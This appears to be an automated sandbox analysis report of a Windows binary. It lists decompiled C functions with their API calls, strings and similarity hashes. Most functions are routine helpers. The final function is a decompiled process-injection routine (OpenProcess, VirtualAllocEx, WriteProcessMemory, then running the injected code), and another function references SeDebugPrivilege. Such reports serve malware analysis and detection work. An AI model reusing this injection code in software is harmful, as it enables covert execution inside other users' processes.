C-Code - Quality: 100%

			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}

0x0040955f
0x00409566
0x0040956e
0x00409576
0x00409586
0x00409586
0x0040956e
0x00409592
0x004095aa
0x00409594
0x004095a3
0x004095a6
0x004095a6

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3

Strings

kernel32.dll, xrefs: 00409561
GetProcessTimes, xrefs: 00409570

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}

APIs

FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
SizeofResource.KERNEL32(?,00000000), ref: 0040A359
LoadResource.KERNEL32(?,00000000), ref: 0040A369
LockResource.KERNEL32(00000000), ref: 0040A374

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88

Uniqueness

Uniqueness Score: -1.00%

Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}

APIs

malloc.MSVCRT ref: 0040496D
memcpy.MSVCRT ref: 00404985
free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E

Strings

W@, xrefs: 0040495B

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: freemallocmemcpy
String ID: W@
API String ID: 3056473165-1729568415
Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}

0x0040543f
0x00405456
0x00405462
0x00405467
0x0040546d
0x00405478
0x00405489
0x0040548d
0x00000000
0x00405492
0x00405496

APIs

memset.MSVCRT ref: 00405456

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8

wcscat.MSVCRT ref: 00405478
LoadLibraryW.KERNELBASE(00000000), ref: 00405489
LoadLibraryW.KERNEL32(?), ref: 00405492

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
String ID:
API String ID: 3725422290-0
Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8

Uniqueness

Uniqueness Score: -1.00%

Function 004056B5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056B5(signed int __ecx, void* __eflags, signed int* _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed short* _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* __edi;
				void* __esi;
				signed short* _t68;
				signed short _t72;
				intOrPtr _t80;
				void* _t82;
				void* _t85;
				intOrPtr _t90;
				signed int _t101;
				intOrPtr _t102;
				void** _t104;
				signed short* _t106;
				signed int* _t107;
				signed int _t110;

				_t94 = __ecx;
				_t101 = 0;
				_v32 = 0x22;
				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 1;
				_v8 = 0;
				_v48 = 0;
				_v36 = 0;
				_v44 = 0;
				_v40 = 0x100;
				_v52 = 0;
				_t68 = E004054B9(_a4);
				_t106 = _a8;
				if( *_t106 == 0) {
					L31:
					_t107 = _a4;
					L32:
					_t102 =  *((intOrPtr*)(_t107 + 0x1c));
					 *((intOrPtr*)(_t107 + 0x30)) = _t102;
					E004055D1(_t68,  &_v52);
					return _t102;
				}
				_v28 = _t106;
				do {
					_t72 =  *_v28 & 0x0000ffff;
					if(_t72 != 0x20 || _v8 != 0) {
						if(_t72 == 0x22 || _t72 == 0x27) {
							if(_v8 != 0) {
								if(_t72 != _v32) {
									goto L14;
								}
								_v8 = _v8 ^ 0x00000001;
								goto L25;
							}
							_v32 = _t72 & 0x0000ffff;
							_v8 = 1;
							goto L25;
						} else {
							L14:
							if(_t101 != 0) {
								L24:
								E0040559A( &_v52, _t101);
								 *((short*)(_v36 + _t101 * 2)) =  *_v28 & 0x0000ffff;
								_t106 = _a8;
								_t101 = _t101 + 1;
								_v12 = _t101;
								L25:
								_v24 = 0;
								goto L26;
							}
							if(_t72 == 0x20) {
								goto L25;
							}
							_t104 = _a4 + 0x20;
							if(_v16 >= 0) {
								_t110 = _v16;
								_t82 = _t104[2];
								if(_t110 != 0xffffffff) {
									E00404951( &(_t104[1]), _t110, _t104, 4, _t82);
								} else {
									free( *_t104);
								}
								_t85 = _t110 + 1;
								if(_t104[3] < _t85) {
									_t104[3] = _t85;
								}
								_t94 = _v20;
								 *((intOrPtr*)( *_t104 + _t110 * 4)) = _v20;
							}
							_t101 = _v12;
							goto L24;
						}
					} else {
						if(_v24 == 0) {
							E0040559A( &_v52, _t101);
							_t90 = _v36;
							 *((short*)(_t90 + _t101 * 2)) = 0;
							if(_t90 == 0) {
								_t90 = 0x40c4e8;
							}
							E004054DF(_a4, _t94, _t90); // executed
							_v16 = _v16 + 1;
							_v24 = 1;
							_v12 = 0;
							_t101 = 0;
						}
					}
					L26:
					_v20 = _v20 + 1;
					_t68 = _t106 + _v20 * 2;
					_v28 = _t68;
				} while ( *_t68 != 0);
				if(_t101 <= 0) {
					goto L31;
				}
				E0040559A( &_v52, _t101);
				_t80 = _v36;
				 *((short*)(_t80 + _t101 * 2)) = 0;
				if(_t80 == 0) {
					_t80 = 0x40c4e8;
				}
				_t107 = _a4;
				_t68 = E004054DF(_t107, _t94, _t80);
				goto L32;
			}

0x004056b5
0x004056c3
0x004056c5
0x004056cc
0x004056cf
0x004056d2
0x004056d5
0x004056dc
0x004056df
0x004056e2
0x004056e5
0x004056e8
0x004056ef
0x004056f2
0x004056f7
0x004056fd
0x00405832
0x00405832
0x00405835
0x00405835
0x00405838
0x0040583e
0x00405849
0x00405849
0x00405703
0x00405706
0x00405709
0x00405710
0x0040575b
0x00405766
0x0040577b
0x00000000
0x00000000
0x0040577d
0x00000000
0x0040577d
0x0040576b
0x0040576e
0x00000000
0x00405783
0x00405783
0x00405785
0x004057d1
0x004057dc
0x004057e4
0x004057e8
0x004057eb
0x004057ec
0x004057ef
0x004057ef
0x00000000
0x004057ef
0x0040578b
0x00000000
0x00000000
0x00405790
0x00405796
0x00405798
0x0040579e
0x004057a1
0x004057b4
0x004057a3
0x004057a5
0x004057a5
0x004057ba
0x004057c1
0x004057c3
0x004057c3
0x004057c8
0x004057cb
0x004057cb
0x004057ce
0x00000000
0x004057ce
0x00405717
0x0040571a
0x00405725
0x0040572a
0x0040572f
0x00405733
0x00405735
0x00405735
0x0040573e
0x00405743
0x00405746
0x0040574d
0x00405750
0x00405750
0x0040571a
0x004057f2
0x004057f2
0x004057f8
0x004057fe
0x004057fe
0x00405809
0x00000000
0x00000000
0x00405810
0x00405815
0x0040581a
0x0040581e
0x00405820
0x00405820
0x00405825
0x0040582b
0x00000000

APIs

Part of subcall function 004054B9: free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
Part of subcall function 004054B9: free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4

Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA

free.MSVCRT(?,00000000,?,00000000), ref: 004057A5

Strings

", xrefs: 004056C5

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID: "
API String ID: 1294909896-123907689
Opcode ID: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
Instruction ID: 1409d80bf75a77decaa3a1a55a0e2bac06d52b88a1a49f7bf6fe6aa810a6aee9
Opcode Fuzzy Hash: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
Instruction Fuzzy Hash: 7F511675D00619EBCB20EF99C8805AEB7B5FF44314F50807BE945B7290D738AA42DF99

Uniqueness

Uniqueness Score: -1.00%

Function 004054B9, Relevance: 2.5, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054B9(intOrPtr* __esi) {

				free( *(__esi + 0x10));
				free( *(__esi + 0xc)); // executed
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}

0x004054bc
0x004054c4
0x004054cd
0x004054cf
0x004054d2
0x004054d5
0x004054d8
0x004054db
0x004054de

APIs

free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48

Uniqueness

Uniqueness Score: -1.00%

Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}

0x00408f4c
0x00408f57
0x00408f60
0x00408f62
0x00408f67
0x00408f67
0x00408f71

APIs

Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA

FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentErrorFreeLastLibraryProcess
String ID:
API String ID: 187924719-0
Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694

Uniqueness

Uniqueness Score: -1.00%

Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}

0x004098fa
0x004098fc
0x00409901
0x00409907
0x00000000
0x0040991c
0x00409918
0x00000000

APIs

Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$FileModuleName
String ID:
API String ID: 3859505661-0
Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208

Uniqueness

Uniqueness Score: -1.00%

Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}

0x004095da
0x004095da
0x004095de
0x004095e1
0x004095e7
0x004095e7
0x004095ee
0x004095fc

APIs

FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}

0x0040a3d0
0x0040a3d9

APIs

EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05

Uniqueness

Uniqueness Score: -1.00%

Function 004055D1, Relevance: 1.3, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055D1(void* __eax, signed int* __esi) {
				void* _t7;
				signed int* _t9;

				_t9 = __esi;
				_t7 = __eax;
				if(__esi[4] != 0) {
					free(__esi[4]); // executed
					__esi[4] = __esi[4] & 0x00000000;
				}
				_t9[2] = _t9[2] & 0x00000000;
				 *_t9 =  *_t9 & 0x00000000;
				return _t7;
			}

0x004055d1
0x004055d1
0x004055d5
0x004055da
0x004055df
0x004055e3
0x004055e4
0x004055e8
0x004055eb

APIs

free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
Instruction ID: d9e56b4edb5911b8eb4629cf82416adf3d5ef3fa420fba14bebf6bcebba5d7e5
Opcode Fuzzy Hash: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
Instruction Fuzzy Hash: FEC00272420B01DBE7355F21D8093A6B3F1FB1032BFA04E6E90A6148E1C7BCA58CCA48

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
memset.MSVCRT ref: 0040A4B3
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0

Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
